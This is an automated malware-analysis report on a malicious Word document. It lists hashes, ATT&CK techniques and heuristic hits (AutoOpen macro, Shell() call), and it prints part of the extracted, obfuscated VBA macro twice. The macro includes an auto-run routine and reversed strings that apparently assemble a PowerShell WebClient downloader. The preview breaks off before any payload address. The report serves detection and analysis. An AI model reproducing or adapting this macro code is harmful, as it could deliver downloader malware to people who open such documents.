Office (OLE) malware analysis — malicious · c0d3acb0c891759e

MALICIOUS

Office (OLE)

189.5 KB Created: 2018-05-16 20:11:00 Authoring application: Microsoft Office Word First seen: 2019-05-10

MD5: afc59783d0f1faa6749046b3f831d932 SHA-1: 8007788525f1dfd8ffd243af8e6ef229fb5dc583 SHA-256: c0d3acb0c891759ef5fb177a8ea3264ef9bf48ab1d3d74f46db2c69e10a82189

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a Microsoft Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, a critical indicator of malicious intent, suggesting it's designed to execute arbitrary commands. The presence of obfuscated VBA code and the AutoOpen trigger strongly implies a downloader or dropper functionality, aiming to fetch and execute a second-stage payload.

Heuristics 5

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 161185 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	161185 bytes
SHA-256: `c9c3d8873a00c266fac26884e13a1f28c1c081cc9146d5a015115c228af259a1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "BvjbubtKGir" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub baOZTs(GddNAP) aihRI = dbXjic Jvclw = (zzzmuK / qKWsQX / 72775 / Fix(asoKhh)) + 34615 - CLng(Ciqqm + CLng(74342)) + BrOUS + 23136 * rmGcwS - CStr(9707) / PLrfiC / CLng(aRzfzz) End Sub Sub ETtDw(BBDTP) BCDEiz = XSfzGD NQzUn = (dninj / TkdNIX / 30965 / Fix(BlWNQf)) + 3990 - CLng(lYTmA + CLng(79324)) + kEifA + 42153 * TQUoj - CStr(21571) / EWbqUI / CLng(ukEIME) JTzui = sJasPN SGsczq = (jCrvfj / qUiXnR / 23497 / Fix(zXtCi)) + 3313 - CLng(wjbHVJ + CLng(76592)) + bJVZUH + 53044 * OzwCp - CStr(92344) / bvbIJ / CLng(iwHdl) IUYLX = cCOSs CVVfEm = (GAOzLu / iVtMN / 91841 / Fix(BTjplZ)) + 99613 - CLng(tGJCj + CLng(12897)) + ADsVif + 10858 * VNRWXG - CStr(17985) / EwIAC / CLng(pSNztG) End Sub Sub pIKtq(pUsRE) ZLcUCb = kEFGb lKOZH = (mwlfEH / hkTiLf / 7606 / Fix(cdMwL)) + 45608 - CLng(WEkCin + CLng(10256)) + bvlnS + 94082 * fYNYuW - CStr(31958) / taXAI / CLng(BavGzc) uCYpbZ = mZrlIo nlmdQF = (qbLmwd / UpjSU / 14180 / Fix(WpjSwY)) + 67684 - CLng(jlsUi + CLng(26489)) + JdiWwD + 50723 * DfvSS - CStr(69444) / TnjNR / CLng(DKUhwW) End Sub Sub Autoopen() On Error Resume Next ZtbvMf = CjwIjv jnBGRj = (SFnVw / FTOozj / 64977 / Fix(JDAFmD)) + 16318 - CLng(oYjVTX + CLng(43345)) + ahnUH + 77435 * aPmbjU - CStr(18234) / zOoWk / CLng(AijPi) DYQNcdfBpbfCJ (PoaYi + mODiMHwrzz + vORtMj) PZpzc = PfPjH AmSZDG = (YXYlp / smYvq / 11646 / Fix(IBUaK)) + 59398 - CLng(pTlzH + CLng(36663)) + iKdoOn + 14180 * zqoAl - CStr(68394) / qkZaGW / CLng(RrPYCP) End Sub Sub mYdWU(bvGcS) BEdmKs = CcAah XjsmZ = (krBKRK / RZLvdw / 14972 / Fix(UtoEE)) + 60420 - CLng(MclwwJ + CLng(93224)) + iIhlhC + 400 * Lcjbvr - CStr(64125) / dZACp / CLng(iUKDi) YTNUV = cmvLZK zccYE = (VvOUXI / kiaNai / 44729 / Fix(VsOLFz)) + 27310 - CLng(bSzqiq + CLng(53768)) + wGQId + 19405 * qLbNwM - CStr(67183) / umsijN / CLng(woHBn) XSKuC = QUOOw tXAdk = (hsiED / LssjHc / 2523 / Fix(WwTsQS)) + 91442 - CLng(RPjYuT + CLng(81479)) + MUErTu + 38650 * PVjKc - CStr(64492) / lMWow / CLng(HMRUq) End Sub Sub SYivsB(XnXJI) cBdvjk = kDuLX tlEHmX = (UBukZr / ZKZOD / 26100 / Fix(UDdRi)) + 68325 - CLng(pOdTXN + CLng(15796)) + Sflmf + 14069 * GtWsbp - CStr(49959) / jIKSZi / CLng(qEnCin) End Sub Attribute VB_Name = "RCdAJstdQ" Sub Ftwkuq(kPkwK) ujhqo = wdcnpc Objhk = (rcNfm / vNjROD / 40065 / Fix(ojRbB)) + 9517 - CLng(SEcGGI + CLng(51585)) + jEizsT + 70315 * DvzsSS - CStr(22483) / kUVfi / CLng(FffHZ) End Sub Function mODiMHwrzz() On Error Resume Next kYjiV = zNjDcn BNfCM = (zsOWlm / zWzCTk / 88686 / Fix(wfPQX)) + 64285 - CLng(whjsi + CLng(51152)) + vZdTiZ + 60411 * CuwZo - CStr(55555) / dkrts / CLng(iQlov) omzRd = MwZTr rnHLZ = (ZbUUz / CGwTbp / 22855 / Fix(bGWvr)) + 97551 - CLng(AlOScC + CLng(36225)) + kkvGuL + 62497 * TpBPW - CStr(34590) / XjHlik / CLng(MTaJY) UObTGH = rYjfPD("ml]rAHc[+701]rAHc[+58]vpSFEN", 66538 + 7 - 66538, 66538 + 20 - 66538) FCVvjZ = jfiRu EDGqjX = (sriUQk / TYbjlm / 81704 / Fix(QTGjzD)) + 19072 - CLng(BprmjN + CLng(11949)) + rlqzOU + 747 * wcvKEC - CStr(62659) / FHnmk / CLng(afiAh) cYVzhB = SFnjAF PkVJuA = (sZjEk / mpzFc / 61084 / Fix(uRvsww)) + 39828 - CLng(iwwTCA + CLng(12162)) + lILjZj + 98405 * uzhwdH - CStr(65479) / VHDwp / CLng(LzfdJa) kfRzClw = rYjfPD("qlqR2rAHc[]gNirtS[,)66SjY", 60457 + 4 - 60457, 60457 + 17 - 60457) lhTfsM = RzYKRI APWFaQ = (wuwHGI / NAvaYz / 16752 / Fix(NSkvl)) + 72854 - CLng(jtjjf + CLng(20331)) + JYiKsm + 75494 * YmEwD - CStr(97216) / ktIpkC / CLng(UfiHc) APHWW = TvhQo FYaKJ = (zZVnFz / IIsOjX / 30308 / Fix(pDifj)) + 30204 - CLng(fqlXuL + CLng(11656)) + tlcadj + 89039 * JKqOJ - CStr(52543) / zsYvQU / CLng(idZBui) YapQdKBiKmu = rYjfPD("RMRZ.QBkUdasnBkU+BkUfzX = BBkU+BkUSNBkU+BkUfzBkU+BkUX;tneiBk'+'U+BkUlCbBkU+BkUeW.teN.metsyS )IyLtceBkU+BkUjB'+'kU+BkUboDW", 20925 + 3 - 20925, 20925 + 113 - 20925) iDTCj = cGzlju UVpBmE = ( ... (truncated)

SHA-256: c9c3d8873a00c266fac26884e13a1f28c1c081cc9146d5a015115c228af259a1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "BvjbubtKGir"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub baOZTs(GddNAP)
aihRI = dbXjic
Jvclw = (zzzmuK / qKWsQX / 72775 / Fix(asoKhh)) + 34615 - CLng(Ciqqm + CLng(74342)) + BrOUS + 23136 * rmGcwS - CStr(9707) / PLrfiC / CLng(aRzfzz)
End Sub
Sub ETtDw(BBDTP)
BCDEiz = XSfzGD
NQzUn = (dninj / TkdNIX / 30965 / Fix(BlWNQf)) + 3990 - CLng(lYTmA + CLng(79324)) + kEifA + 42153 * TQUoj - CStr(21571) / EWbqUI / CLng(ukEIME)
JTzui = sJasPN
SGsczq = (jCrvfj / qUiXnR / 23497 / Fix(zXtCi)) + 3313 - CLng(wjbHVJ + CLng(76592)) + bJVZUH + 53044 * OzwCp - CStr(92344) / bvbIJ / CLng(iwHdl)
IUYLX = cCOSs
CVVfEm = (GAOzLu / iVtMN / 91841 / Fix(BTjplZ)) + 99613 - CLng(tGJCj + CLng(12897)) + ADsVif + 10858 * VNRWXG - CStr(17985) / EwIAC / CLng(pSNztG)
End Sub
Sub pIKtq(pUsRE)
ZLcUCb = kEFGb
lKOZH = (mwlfEH / hkTiLf / 7606 / Fix(cdMwL)) + 45608 - CLng(WEkCin + CLng(10256)) + bvlnS + 94082 * fYNYuW - CStr(31958) / taXAI / CLng(BavGzc)
uCYpbZ = mZrlIo
nlmdQF = (qbLmwd / UpjSU / 14180 / Fix(WpjSwY)) + 67684 - CLng(jlsUi + CLng(26489)) + JdiWwD + 50723 * DfvSS - CStr(69444) / TnjNR / CLng(DKUhwW)
End Sub
Sub Autoopen()
On Error Resume Next
ZtbvMf = CjwIjv
jnBGRj = (SFnVw / FTOozj / 64977 / Fix(JDAFmD)) + 16318 - CLng(oYjVTX + CLng(43345)) + ahnUH + 77435 * aPmbjU - CStr(18234) / zOoWk / CLng(AijPi)
DYQNcdfBpbfCJ (PoaYi + mODiMHwrzz + vORtMj)
PZpzc = PfPjH
AmSZDG = (YXYlp / smYvq / 11646 / Fix(IBUaK)) + 59398 - CLng(pTlzH + CLng(36663)) + iKdoOn + 14180 * zqoAl - CStr(68394) / qkZaGW / CLng(RrPYCP)
End Sub
Sub mYdWU(bvGcS)
BEdmKs = CcAah
XjsmZ = (krBKRK / RZLvdw / 14972 / Fix(UtoEE)) + 60420 - CLng(MclwwJ + CLng(93224)) + iIhlhC + 400 * Lcjbvr - CStr(64125) / dZACp / CLng(iUKDi)
YTNUV = cmvLZK
zccYE = (VvOUXI / kiaNai / 44729 / Fix(VsOLFz)) + 27310 - CLng(bSzqiq + CLng(53768)) + wGQId + 19405 * qLbNwM - CStr(67183) / umsijN / CLng(woHBn)
XSKuC = QUOOw
tXAdk = (hsiED / LssjHc / 2523 / Fix(WwTsQS)) + 91442 - CLng(RPjYuT + CLng(81479)) + MUErTu + 38650 * PVjKc - CStr(64492) / lMWow / CLng(HMRUq)
End Sub
Sub SYivsB(XnXJI)
cBdvjk = kDuLX
tlEHmX = (UBukZr / ZKZOD / 26100 / Fix(UDdRi)) + 68325 - CLng(pOdTXN + CLng(15796)) + Sflmf + 14069 * GtWsbp - CStr(49959) / jIKSZi / CLng(qEnCin)
End Sub

Attribute VB_Name = "RCdAJstdQ"
Sub Ftwkuq(kPkwK)
ujhqo = wdcnpc
Objhk = (rcNfm / vNjROD / 40065 / Fix(ojRbB)) + 9517 - CLng(SEcGGI + CLng(51585)) + jEizsT + 70315 * DvzsSS - CStr(22483) / kUVfi / CLng(FffHZ)
End Sub
Function mODiMHwrzz()
On Error Resume Next
kYjiV = zNjDcn
BNfCM = (zsOWlm / zWzCTk / 88686 / Fix(wfPQX)) + 64285 - CLng(whjsi + CLng(51152)) + vZdTiZ + 60411 * CuwZo - CStr(55555) / dkrts / CLng(iQlov)
omzRd = MwZTr
rnHLZ = (ZbUUz / CGwTbp / 22855 / Fix(bGWvr)) + 97551 - CLng(AlOScC + CLng(36225)) + kkvGuL + 62497 * TpBPW - CStr(34590) / XjHlik / CLng(MTaJY)
UObTGH = rYjfPD("ml]rAHc[+701]rAHc[+58]vpSFEN", 66538 + 7 - 66538, 66538 + 20 - 66538)
FCVvjZ = jfiRu
EDGqjX = (sriUQk / TYbjlm / 81704 / Fix(QTGjzD)) + 19072 - CLng(BprmjN + CLng(11949)) + rlqzOU + 747 * wcvKEC - CStr(62659) / FHnmk / CLng(afiAh)
cYVzhB = SFnjAF
PkVJuA = (sZjEk / mpzFc / 61084 / Fix(uRvsww)) + 39828 - CLng(iwwTCA + CLng(12162)) + lILjZj + 98405 * uzhwdH - CStr(65479) / VHDwp / CLng(LzfdJa)
kfRzClw = rYjfPD("qlqR2rAHc[]gNirtS[,)66SjY", 60457 + 4 - 60457, 60457 + 17 - 60457)
lhTfsM = RzYKRI
APWFaQ = (wuwHGI / NAvaYz / 16752 / Fix(NSkvl)) + 72854 - CLng(jtjjf + CLng(20331)) + JYiKsm + 75494 * YmEwD - CStr(97216) / ktIpkC / CLng(UfiHc)
APHWW = TvhQo
FYaKJ = (zZVnFz / IIsOjX / 30308 / Fix(pDifj)) + 30204 - CLng(fqlXuL + CLng(11656)) + tlcadj + 89039 * JKqOJ - CStr(52543) / zsYvQU / CLng(idZBui)
YapQdKBiKmu = rYjfPD("RMRZ.QBkUdasnBkU+BkUfzX = BBkU+BkUSNBkU+BkUfzBkU+BkUX;tneiBk'+'U+BkUlCbBkU+BkUeW.teN.metsyS )IyLtceBkU+BkUjB'+'kU+BkUboDW", 20925 + 3 - 20925, 20925 + 113 - 20925)
iDTCj = cGzlju
UVpBmE = (
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.